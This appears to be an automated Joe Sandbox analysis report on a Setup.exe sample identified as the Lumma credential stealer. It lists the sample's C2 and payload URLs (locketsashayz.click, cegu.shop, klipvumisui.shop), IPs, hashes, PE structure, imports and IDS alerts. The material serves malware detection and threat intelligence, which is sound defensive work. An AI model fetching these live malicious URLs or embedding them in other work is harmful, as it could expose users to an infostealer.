https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | Setup.exe, 00000000.00000003.1844628829.0000000004151000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://locketsashayz.click/M | Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://locketsashayz.click/H | Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.mozilla.org/products/firefoxgro.all | Setup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://cegu.shop/8574262446/ph.txtks | Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://locketsashayz.click/lao | Setup.exe, 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipvumisui.shop/int_clp_sha.txt | Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://locketsashayz.click/apil | Setup.exe, 00000000.00000003.1923253582.00000000014E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://locketsashayz.click/0R | Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://ocsp.rootca1.amazontrust.com0: | Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | Setup.exe, 00000000.00000003.1844311579.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1844628829.0000000004176000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855827398.0000000004176000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855995799.0000000004176000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://locketsashayz.click/ | Setup.exe, 00000000.00000002.4139549503.0000000001419000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959070741.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944632767.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://cegu.shop/Q | Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | Setup.exe, 00000000.00000003.1909048783.0000000004241000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://ac.ecosia.org/autocomplete?q= | Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://klipvumisui.shop/int_clp_sha.txt)E | Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://cegu.shop/I | Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://locketsashayz.click/apiU | Setup.exe, 00000000.00000003.2605320460.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139721982.0000000001470000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://locketsashayz.click/apiV | Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://locketsashayz.click/bu9 | Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.micro | Setup.exe, 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944587341.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959265174.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605662760.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://support.microsof | Setup.exe, 00000000.00000003.1844311579.00000000041C4000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://locketsashayz.click/apiR | Setup.exe, 00000000.00000003.1968199543.00000000014E8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cegu.shop/5 | Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | Setup.exe, 00000000.00000003.1844628829.0000000004151000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://locketsashayz.click/bu | Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | locketsashayz.click | European Union | 13335 | CLOUDFLARENETUS | true
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1583039
Start date and time: 2025-01-01 16:55:15 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 46s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Setup.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240s for sample files taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Setup.exe, PID 6984 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:56:21 | API Interceptor | 9x Sleep call for process: Setup.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
188.114.97.3 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.rgenerousrs.store/o362/
188.114.97.3 | A2028041200SD.exe | malicious | FormBook | www.beylikduzu616161.xyz/2nga/
188.114.97.3 | Delivery_Notification_00000260791.doc.js | malicious | Unknown | radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
188.114.97.3 | ce.vbs | malicious | Unknown | paste.ee/d/lxvbq
188.114.97.3 | Label_00000852555.doc.js | malicious | Unknown | tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
188.114.97.3 | PO 20495088.exe | malicious | FormBook | www.ssrnoremt-rise.sbs/3jsc/
188.114.97.3 | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/zWkbOqX7/download
188.114.97.3 | http://kklk16.bsyo45ksda.top | malicious | Unknown | kklk16.bsyo45ksda.top/favicon.ico
188.114.97.3 | gusetup.exe | malicious | Unknown | www.glarysoft.com/update/glary-utilities/pro/pro50/
188.114.97.3 | Online Interview Scheduling Form.lnk | malicious | Ducktail | gmtagency.online/api/check
185.161.251.21 | Active_Setup.exe | malicious | LummaC Stealer |
185.161.251.21 | Active_Setup.exe | malicious | LummaC |
185.161.251.21 | Poket.mp4.hta | malicious | LummaC |
185.161.251.21 | setup.exe | malicious | LummaC |
185.161.251.21 | Active_Setup.exe | malicious | LummaC |
185.161.251.21 | Set-up.exe | malicious | LummaC |
185.161.251.21 | #Setup.exe | malicious | LummaC |
185.161.251.21 | installer_1.05_36.5.exe | malicious | LummaC |
185.161.251.21 | @Setup.exe | malicious | LummaC Stealer |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
cegu.shop | Active_Setup.exe | malicious | LummaC Stealer | 185.161.251.21
cegu.shop | Active_Setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Poket.mp4.hta | malicious | LummaC | 185.161.251.21
cegu.shop | setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Active_Setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | Set-up.exe | malicious | LummaC | 185.161.251.21
cegu.shop | #Setup.exe | malicious | LummaC | 185.161.251.21
cegu.shop | installer_1.05_36.5.exe | malicious | LummaC | 185.161.251.21
cegu.shop | @Setup.exe | malicious | LummaC Stealer | 185.161.251.21
locketsashayz.click | #Setup.exe | malicious | LummaC | 188.114.97.3
locketsashayz.click | Set-up.exe | malicious | LummaC | 104.21.57.27
locketsashayz.click | Set-up.exe | malicious | LummaC Stealer | 172.67.158.190

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | qnUFsmyxMm.exe | malicious | LummaC | 172.67.219.133
CLOUDFLARENETUS | Gz1bBIg2Tw.exe | malicious | LummaC | 172.67.157.254
CLOUDFLARENETUS | yTcaknrrb8.exe | malicious | LummaC | 104.21.92.91
CLOUDFLARENETUS | Active_Setup.exe | malicious | LummaC Stealer | 172.67.198.102
CLOUDFLARENETUS | eP6sjvTqJa.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.21.38.84
CLOUDFLARENETUS | GqjiKlwarV.exe | malicious | DCRat, PureLog Stealer, zgRAT | 172.67.220.198
CLOUDFLARENETUS | 1znAXdPcM5.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.21.38.84
CLOUDFLARENETUS | YGk3y6Tdix.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.21.38.84
CLOUDFLARENETUS | https://mmm.askfollow.us/#CRD | malicious | Unknown | 104.17.24.14
CLOUDFLARENETUS | http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X | malicious | Unknown | 104.26.13.60
NTLGB | Active_Setup.exe | malicious | LummaC Stealer | 185.161.251.21
NTLGB | Active_Setup.exe | malicious | LummaC | 185.161.251.21
NTLGB | Poket.mp4.hta | malicious | LummaC | 185.161.251.21
NTLGB | kwari.arm.elf | malicious | Unknown | 80.4.160.37
NTLGB | setup.exe | malicious | LummaC | 185.161.251.21
NTLGB | Active_Setup.exe | malicious | LummaC | 185.161.251.21
NTLGB | Set-up.exe | malicious | LummaC | 185.161.251.21
NTLGB | #Setup.exe | malicious | LummaC | 185.161.251.21
NTLGB | botx.ppc.elf | malicious | Mirai | 82.31.53.184

Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | qnUFsmyxMm.exe | malicious | LummaC | 188.114.97.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | Gz1bBIg2Tw.exe | malicious | LummaC | 188.114.97.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | yTcaknrrb8.exe | malicious | LummaC | 188.114.97.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | Active_Setup.exe | malicious | LummaC Stealer | 188.114.97.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | Loader.exe | malicious | LummaC | 188.114.97.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | Loader.exe | malicious | LummaC | 188.114.97.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | PASS-1234.exe | malicious | LummaC | 188.114.97.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | Loader.exe | malicious | LummaC | 188.114.97.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | Launcher_x64.exe | malicious | LummaC | 188.114.97.3, 185.161.251.21
a0e9f5d64349fb13191bc781f81f42e1 | Solara-Roblox-Executor-v3.exe | malicious | LummaC | 188.114.97.3, 185.161.251.21
                                                                                                      No context
                                                                                                      No created / dropped files found
                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):0.3892449133522304
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:Setup.exe
                                                                                                      File size:74'880'677 bytes
                                                                                                      MD5:abda8cea9c2d8bc35847d4d189f61f2e
                                                                                                      SHA1:ce38f933a30778130b53792109531056dfe7c03c
                                                                                                      SHA256:844b0fdfa66fd6d10179b74ae064c30624581a833bf1eb759e03fd2c664bae03
                                                                                                      SHA512:054036d0f81216efb7e0469abf62cbb3cdd06406b6a25778d6a1557bf8774f7f27d97e5bb9513b54a4f9a7cd8da1cab3e8bf2630e686f71454c0ff54f566cab4
                                                                                                      SSDEEP:12288:c9YadW8cfnpp2pd9VvvCbs492tkIMi88hmXF8hMvW+I8uwqPwc7X2BoA/yW93BnY:MdW88nTb92LMX8oXF8hBgqYcJ
                                                                                                      TLSH:90F70832D720A9F0578B44DFC522DAE9D5BE6B03132298F7514B39C7E98B4D8433AC69
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=(JeyI$6yI$6yI$6p1.6iI$6+! 7uI$6+!'7}I$6+!!7fI$6+!%7}I$6.-%7pI$6yI%6.I$6. 7cI$6. -7sI$6. .6xI$6. &7xI$6RichyI$6...............
                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                      Entrypoint:0x4267ce
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:true
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x66BAEAF9 [Tue Aug 13 05:11:21 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:6
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:6
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:1027691d74412499ffdeec8b7ed717af
Signature Valid:false
Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232
Not Before, Not After
• 15/12/2020 21:24:20 02/12/2021 21:24:20
Subject Chain
• CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:3
Thumbprint MD5:4068B1B0494EFA79F5A751DCCA8111CD
Thumbprint SHA-1:914A09C2E02C696AF394048BCB8D95449BCD5B9E
Thumbprint SHA-256:4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
Serial:33000003DFFB6AE3F427ECB6A30000000003DF
Instruction
call 00007F75E8F03E6Dh
jmp 00007F75E8F03599h
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0042908Ch]
push dword ptr [ebp+08h]
call dword ptr [00429088h]
push C0000409h
call dword ptr [00429090h]
push eax
call dword ptr [00429094h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call 00007F75E8F04010h
test eax, eax
je 00007F75E8F03727h
push 00000002h
pop ecx
int 29h
mov dword ptr [0042F678h], eax
mov dword ptr [0042F674h], ecx
mov dword ptr [0042F670h], edx
mov dword ptr [0042F66Ch], ebx
mov dword ptr [0042F668h], esi
mov dword ptr [0042F664h], edi
mov word ptr [0042F690h], ss
mov word ptr [0042F684h], cs
mov word ptr [0042F660h], ds
mov word ptr [0042F65Ch], es
mov word ptr [0042F658h], fs
mov word ptr [0042F654h], gs
pushfd
pop dword ptr [0042F688h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0042F67Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0042F680h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0042F68Ch], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [0042F5C8h], 00010001h
Programming Language:
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2c824 | 0x12c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x31000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x47674d5 | 0x21d0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x32000 | 0x140c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2acc0 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x2add0 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2ad30 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x29000 | 0x240 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x27481 | 0x27600 | 47f72ae360dd3c78303465b05e680715 | False | 0.49032118055555557 | data | 6.585884608495068 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x29000 | 0x465c | 0x4800 | ed312862ecd77389c22fa4661daddd30 | False | 0.3819986979166667 | data | 4.747279151971027 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2e000 | 0x2128 | 0x1600 | 15ecf71cb8ad22f220fe3a08232e5b97 | False | 0.3643465909090909 | data | 4.901400366248305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x31000 | 0x1e0 | 0x200 | ad7b78e84f1d02fc883315380c423021 | False | 0.529296875 | data | 4.7176788329467545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x32000 | 0x52000 | 0x52000 | eab2e80fdb41a271c56495e0eface1a1 | False | 0.6910043111661586 | data | 7.576542253916384 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x31060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, UnmapViewOfFile, CreateFileMappingA, MapViewOfFile, CreateEventA, GetExitCodeThread, SetEvent, ResetEvent, Sleep, CreateToolhelp32Snapshot, Process32Next, WaitForMultipleObjects, GetModuleFileNameA, GetPrivateProfileIntA, LoadLibraryA, GetProcAddress, FreeLibrary, InitializeCriticalSection, GetModuleFileNameW, CreateProcessW, GetExitCodeProcess, GetTickCount, WaitForSingleObjectEx, CreateEventW, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, QueryPerformanceCounter, GetCurrentProcessId, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, WaitForSingleObject, CloseHandle, CreateThread, ReleaseMutex, CreateMutexA, MultiByteToWideChar, SetErrorMode
USER32.dll | FindWindowExA, LoadIconA, LoadCursorA, RegisterClassExA, CreateWindowExA, ShowWindow, UpdateWindow, GetMessageA, TranslateMessage, DispatchMessageA, DestroyWindow, PostQuitMessage, DefWindowProcA, SendMessageA, PostMessageA
GDI32.dll | GetStockObject
ADVAPI32.dll | RegCloseKey, RegCreateKeyExW, RegOpenKeyExW, RegSetValueExW
MSVCP140.dll | ?_Xout_of_range@std@@YAXPBD@Z, ?_Xlength_error@std@@YAXPBD@Z
VCRUNTIME140.dll | memmove, _except_handler4_common, _CxxThrowException, __std_exception_destroy, __std_exception_copy, memcpy, memset, wcsrchr, longjmp, _purecall, __CxxFrameHandler3, _setjmp3
api-ms-win-crt-runtime-l1-1-0.dll | _crt_atexit, _initialize_onexit_table, _cexit, _configure_narrow_argv, _set_app_type, _register_onexit_function, _get_initial_narrow_environment, _initterm, _initterm_e, _exit, _register_thread_local_exe_atexit_callback, __p___argc, __p___argv, _c_exit, _initialize_narrow_environment, _invalid_parameter_noinfo, exit, terminate, _controlfp_s, _errno, _invalid_parameter_noinfo_noreturn, _seh_filter_exe
api-ms-win-crt-stdio-l1-1-0.dll | __p__commode, fwrite, __stdio_common_vsscanf, ftell, fseek, __stdio_common_vsprintf, _wfopen_s, __stdio_common_vsprintf_s, __stdio_common_vswprintf_s, fclose, __acrt_iob_func, _set_fmode, __stdio_common_vfprintf, fread_s
api-ms-win-crt-filesystem-l1-1-0.dll | _splitpath_s, _wsplitpath_s
api-ms-win-crt-string-l1-1-0.dll | strncmp, _strnicmp, toupper, strncpy, _wcsicmp
api-ms-win-crt-environment-l1-1-0.dll | getenv
api-ms-win-crt-heap-l1-1-0.dll | _callnewh, free, malloc, _set_new_mode
api-ms-win-crt-math-l1-1-0.dll | __setusermatherr
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-01T16:56:21.916765+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:22.676192+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:22.676192+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:23.166077+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:23.640646+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:23.640646+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:24.615969+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 188.114.97.3 | 443 | TCP
2025-01-01T16:56:25.800459+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 188.114.97.3 | 443 | TCP
